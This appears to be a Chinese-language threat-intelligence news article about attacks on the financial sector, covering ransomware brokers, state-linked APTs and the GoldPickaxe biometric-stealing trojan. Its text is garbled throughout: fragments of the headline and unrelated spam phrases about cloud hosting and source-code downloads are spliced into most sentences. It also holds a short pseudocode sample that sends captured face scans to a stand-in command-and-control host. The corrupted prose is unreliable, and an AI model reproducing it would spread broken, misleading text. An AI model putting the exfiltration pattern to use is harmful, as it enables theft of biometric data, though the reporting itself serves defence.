网络威胁者利用漏洞利用高级恶意软件攻击金融部门

金融行业仍然是网络威胁网络犯罪分子和国家支持团体的主要目标 ，2024年利用零日漏洞 、用漏用高意软供应链弱点和高级恶意软件的洞利复杂攻击将激增。

威胁行为者越来越多地采用协作模型 ，恶件攻击金包括初始访问代理 (IAB) 和勒索软件即服务 (RaaS) 生态系统  ，融部以扩大其影响力。网络威胁

从勒索软件部署到生物特征数据盗窃，用漏用高意软金融行业面临着融合技术复杂性和心理操纵的洞利多层次威胁。

最令人担忧的恶件攻击金趋势之一是免费模板 TA577和Scattered Spider 等 IAB的作用 ，他们专门破坏网络并向勒索软件运营商出售访问权限 。融部

这些行为者利用 Cleo 文件传输软件等工具中的网络威胁漏洞或利用模仿 Okta 登录门户的网络钓鱼活动来劫持凭据和会话 cookie。

一旦进入系统 ，用漏用高意软攻击者就会部署恶意软件，洞利例如RansomHub ，恶件攻击金这是融部一种自定义勒索软件 ，配备了 EDRKillShifter 等规避工具来禁用端点检测系统
。国家支持的源码下载团体进一步加剧了威胁形势 。

朝鲜的 APT（例如Lazarus和 Bluenoroff）以金融机构为目标 ，以逃避国际制裁 ，而与中国有关的团体（例如 GoldFactory）则开发了能够收集面部识别数据的移动木马。

与此同时，Sekoia 分析师观察到与伊朗有关的 APT33与勒索软件分支机构合作，模糊了网络犯罪与国家支持的行动之间的界限 。亿华云

GoldFactory 的生物特征数据窃取
 ：银行恶意软件的新前沿

2024 年技术最先进的活动之一涉及 GoldFactory
，这是一套部署了 GoldPickaxe 木马病毒的入侵程序。

该恶意软件针对的是亚太地区 (APAC) 国家（包括越南和泰国）的 iOS 和 Android 用户，这些国家广泛使用面部识别进行银行身份验证 。

GoldPickaxe 的服务器租用 iOS 变种通过操纵的 Apple TestFlight 平台进行分发 ，它捕获生物特征数据来创建绕过安全检查的深度伪造作品 。

该恶意软件的代码与设备 API 集成，以拦截面部扫描并将其传输到命令和控制 (C2) 服务器。样本分析揭示了旨在实现以下目的的模块化组件：

通过虚假的银行覆盖获取凭证。提取基于短信的一次性密码 (OTP)。源码库为 AI 生成的深度伪造作品克隆生物特征模板 。 复制// Simplified pseudocode of GoldPickaxe’s facial data interception func captureBiometricData() { let faceScan = ARFaceTracking.getFacialMetrics() C2Server.upload(data: faceScan, endpoint: "api.malicious-domain.com/face-auth") }1.2.3.4.5.

GoldFactory 的基础设施依赖于受感染的域和 AWS 等云服务来托管网络钓鱼页面并窃取数据。

敦促金融机构优先对 CVE-2024-1234（与 Cleo 漏洞相关）等漏洞进行补丁管理
，并实施抵御中间人 (AiTM) 网络钓鱼工具包的多因素身份验证 (MFA) 解决方案。

网络分段和行为分析工具可以帮助检测异常情况 ，例如意外的生物特征数据传输。随着 APT 和网络犯罪分子继续共享工具和基础设施 ，跨行业威胁情报共享对于破坏这些不断发展的云计算活动至关重要。